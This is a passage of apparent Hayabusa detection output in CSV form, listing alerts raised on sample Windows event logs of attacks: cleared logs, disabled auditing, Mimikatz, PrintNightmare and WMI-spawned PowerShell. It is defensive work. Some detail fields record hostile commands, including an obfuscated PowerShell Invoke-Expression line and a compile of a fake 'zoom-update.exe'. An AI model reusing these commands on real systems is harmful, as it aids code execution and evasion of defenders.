admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx -2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx -2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx -2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" -2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" -2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx -2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx -2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs : Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx -2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: 